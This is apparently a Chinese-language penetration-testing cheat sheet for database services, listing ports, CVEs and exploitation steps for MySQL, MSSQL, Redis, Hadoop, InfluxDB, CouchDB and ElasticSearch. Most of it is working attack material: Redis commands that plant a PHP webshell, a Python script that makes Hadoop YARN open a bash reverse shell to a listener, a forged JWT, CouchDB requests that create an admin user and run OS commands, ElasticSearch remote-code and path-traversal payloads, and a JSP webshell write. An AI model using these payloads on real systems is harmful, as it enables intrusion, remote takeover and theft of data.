数据库安全

mysql

端口：3306

mysql身份认证漏洞

CVE-2012-2122
受影响的产品： All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 存在漏洞

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23不存在漏洞.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 不存在漏洞.

use auxiliary/scanner/mysql/mysql_authbypass_hashdump
直接获取密码hash，解码获得密码

mssql

端口：1433

mssql远程代码执行

CVE-2020-0618

SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE)
SQL Server 2012 for x64-based Systems Service Pack 4 (QFE)
SQL Server 2014 Service Pack 3 for 32-bit Systems (CU)
SQL Server 2014 Service Pack 3 for 32-bit Systems (GDR)
SQL Server 2014 Service Pack 3 for x64-based Systems (CU)
SQL Server 2014 Service Pack 3 for x64-based Systems (GDR)
SQL Server 2016 for x64-based Systems Service Pack 1
SQL Server 2016 for x64-based Systems Service Pack 2 (CU)
SQL Server 2016 for x64-based Systems Service Pack 2 (GDR)

SQL Server 远程代码执行漏洞复现（cve-2020-0618）_microsoft sql server 2016 sp2漏洞复现-CSDN博客

构造payload，构造postman数据包，监听，发送数据包返回命令行

postgresql

端口：5432

oracle

端口：1521

Redis：

端口：6379

Redis未授权

默认无密码，写webshell，写定时任务，写公私钥

config set dir /tmp #设置 WEB 写入目录
config set dbfilename 1.php #设置写入文件名
set test "<?php phpinfo();?>" #设置写入文件代码
bgsave #保存执行
save #保存执行

MongoDB：

端口：27017

Hadoop

端口：8020，9000，9820，9870，9864，8088，19888，50070，50075

hadoop未授权漏洞

版本：全版本，无补丁，可以开启安全认证防御

执行命令getshell

import requeststarget = 'http://192.168.122.131:8088/'
lhost = '192.168.122.131'  # 监听地址 put your local host ip here, and listen at port 9999
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {'application-id': app_id,'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, # 监听端口号},},'application-type': 'YARN',
}
requests.post(url, json=data)

监听，运行脚本，反弹shell

H2database

端口：20051

漏洞范围：设置错误
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true

Influxdb

端口：8086，8088

Influxdb未授权访问

CVE-2019-20933

影响版本：Influxdb < 1.7.6

http://xxx:8086/debug/vars可查看系统服务信息

用一个存在用户和未过期时间戳生成一个jwt，绕过身份验证

JSON Web Tokens - jwt.io

时间戳(Unix timestamp)转换工具 - 在线工具 (tool.lu)

在数据包中加入jwt和查询语句

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzEyMjgxNzk3fQ.WAEt51lQ-mqTH5IcCQb1S7NcZQWKV5GbW9mB3rAlBjM

db=sample&q=show users

CouchDB

端口：5984

couchdb垂直越权

CVE-2017-12635

影响版本：1.7.0之前和2.1.1之前

访问http://192.168.122.131:5984/_utils登录页面

构造数据包创建一个admin权限的新用户

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.122.131:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 96{"type": "user","name": "vulhub","roles": ["_admin"],"password": "vulhub"
}

提示只有管理员才能设置role角色，但构造数据包可以绕过验证

PUT /_users/org.couchdb.user:vulhub1 HTTP/1.1
Host: 192.168.122.131:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 113{"type": "user","name": "vulhub1","roles": ["_admin"],"roles": [],"password": "vulhub"
}

使用账号密码成功登录

couchdb命令执行漏洞

CVE-2017-12636

影响版本：1.7.0之前和2.1.1之前

1.x和2.x版本接口不同，利用方式稍不一样

CVE-2017-12636（Couchdb任意命令执行漏洞） - toby123 - 博客园 (cnblogs.com)

curl -X PUT 'http://vulhub:vulhub@192.168.122.131:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'curl -X PUT 'http://vulhub:vulhub@192.168.122.131:5984/vultest'curl -X PUT 'http://vulhub:vulhub@192.168.122.131:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'curl -X POST 'http://vulhub:vulhub@192.168.122.131:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

执行成功

couchdb代码执行漏洞

CVE-2022-24706

影响版本：3.2.2之前

直接上poc

vulhub/couchdb/CVE-2022-24706/poc.py at master · vulhub/vulhub · GitHub

ElasticSearch

端口：9200，9300

ElasticSearch 命令执行

CVE-2014-3120

elasticsearch版本：v1.1.1

首先，该漏洞需要es中至少存在一条数据，所以我们需要先创建一条数据：

抓包发包，命令执行

POST /_search?pretty HTTP/1.1
Host:192.168.122.131:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 356{"size": 1,"query": {"filtered": {"query": {"match_all": {}}}},"script_fields": {"command": {"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"}}
}

ElasticSearch代码执行

CVE-2015-1427

版本：v1.4.2

首先，该漏洞需要es中至少存在一条数据，所以我们需要先创建一条数据，省略

发送包含payload的数据包

POST /_search?pretty HTTP/1.1
Host:192.168.122.131:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 156{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

ElasticSearch 目录穿越

CVE-2015-3337

影响版本：1.4.5以下/1.5.2以下

浏览器访问不行，burp发包访问http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwdElasticSearch 目录穿越http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd

ElasticSearch 目录穿越

CVE-2015-5531

影响版本：1.6.1以下

新建一个仓库

创建一个快照

目录穿越读取任意文件

http://192.168.122.131:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

返回结果未文件内容的ascii码

解码脚本

p='114, 111, 111, 116, 58, 120, 58, 48, 58, 48, 58, 114, 111, 111, 116, 58, 47, 114, 111, 111, 116, 58, 47, 98, 105, 110, 47, 98, 97, 115, 104, 10, 100, 97, 101, 109, 111, 110, 58, 120, 58, 49, 58, 49, 58, 100, 97, 101, 109, 111, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 105, 110, 58, 120, 58, 50, 58, 50, 58, 98, 105, 110, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 115, 58, 120, 58, 51, 58, 51, 58, 115, 121, 115, 58, 47, 100, 101, 118, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 110, 99, 58, 120, 58, 52, 58, 54, 53, 53, 51, 52, 58, 115, 121, 110, 99, 58, 47, 98, 105, 110, 58, 47, 98, 105, 110, 47, 115, 121, 110, 99, 10, 103, 97, 109, 101, 115, 58, 120, 58, 53, 58, 54, 48, 58, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 110, 58, 120, 58, 54, 58, 49, 50, 58, 109, 97, 110, 58, 47, 118, 97, 114, 47, 99, 97, 99, 104, 101, 47, 109, 97, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 112, 58, 120, 58, 55, 58, 55, 58, 108, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 108, 112, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 105, 108, 58, 120, 58, 56, 58, 56, 58, 109, 97, 105, 108, 58, 47, 118, 97, 114, 47, 109, 97, 105, 108, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 101, 119, 115, 58, 120, 58, 57, 58, 57, 58, 110, 101, 119, 115, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 110, 101, 119, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 117, 117, 99, 112, 58, 120, 58, 49, 48, 58, 49, 48, 58, 117, 117, 99, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 117, 117, 99, 112, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 112, 114, 111, 120, 121, 58, 120, 58, 49, 51, 58, 49, 51, 58, 112, 114, 111, 120, 121, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 119, 119, 119, 45, 100, 97, 116, 97, 58, 120, 58, 51, 51, 58, 51, 51, 58, 119, 119, 119, 45, 100, 97, 116, 97, 58, 47, 118, 97, 114, 47, 119, 119, 119, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 97, 99, 107, 117, 112, 58, 120, 58, 51, 52, 58, 51, 52, 58, 98, 97, 99, 107, 117, 112, 58, 47, 118, 97, 114, 47, 98, 97, 99, 107, 117, 112, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 105, 115, 116, 58, 120, 58, 51, 56, 58, 51, 56, 58, 77, 97, 105, 108, 105, 110, 103, 32, 76, 105, 115, 116, 32, 77, 97, 110, 97, 103, 101, 114, 58, 47, 118, 97, 114, 47, 108, 105, 115, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 105, 114, 99, 58, 120, 58, 51, 57, 58, 51, 57, 58, 105, 114, 99, 100, 58, 47, 118, 97, 114, 47, 114, 117, 110, 47, 105, 114, 99, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 103, 110, 97, 116, 115, 58, 120, 58, 52, 49, 58, 52, 49, 58, 71, 110, 97, 116, 115, 32, 66, 117, 103, 45, 82, 101, 112, 111, 114, 116, 105, 110, 103, 32, 83, 121, 115, 116, 101, 109, 32, 40, 97, 100, 109, 105, 110, 41, 58, 47, 118, 97, 114, 47, 108, 105, 98, 47, 103, 110, 97, 116, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 111, 98, 111, 100, 121, 58, 120, 58, 54, 53, 53, 51, 52, 58, 54, 53, 53, 51, 52, 58, 110, 111, 98, 111, 100, 121, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 95, 97, 112, 116, 58, 120, 58, 49, 48, 48, 58, 54, 53, 53, 51, 52, 58, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 98, 105, 110, 47, 102, 97, 108, 115, 101, 10'
q=p.replace(',','')  #将数值中间的/替换为,
list = q.split(" ") #将字符串转换为列表
list2=[]for i in list:x=int(i)str = chr(x)list2.append(str)  #将列表里的int型的ascii数值转换为字符串类型并加入至空列表内ss=''.join(list2) #将列表转换为字符串
print(ss)

Elasticsearch写入webshell

WooYun-2015-110216

影响版本：1.5.x以前

首先创建一个恶意索引文档：(这里指定了shell文件为test.jsp，其中的ascii码值为/test.jsp)

curl -XPOST http://192.168.122.131:9200/yz.jsp/yz.jsp/1 -d '{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}' 

再创建一个恶意的存储库，其中location的值即为我要写入的路径。

curl -XPUT 'http://192.168.122.131:9200/_snapshot/yz.jsp' -d '{"type": "fs","settings": {"location": "/usr/local/tomcat/webapps/wwwroot/","compress": false}
}'

存储库验证并创建:

curl -XPUT "http://192.168.122.131:9200/_snapshot/yz.jsp/yz.jsp" -d '{"indices": "yz.jsp","ignore_unavailable": "true","include_global_state": false
}'

#访问以下网址，写入shell代码
http://192.168.122.131:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success

#访问以下url，test.jsp就是我们写入的webshell
http://192.168.122.131:8080/wwwroot/test.jsp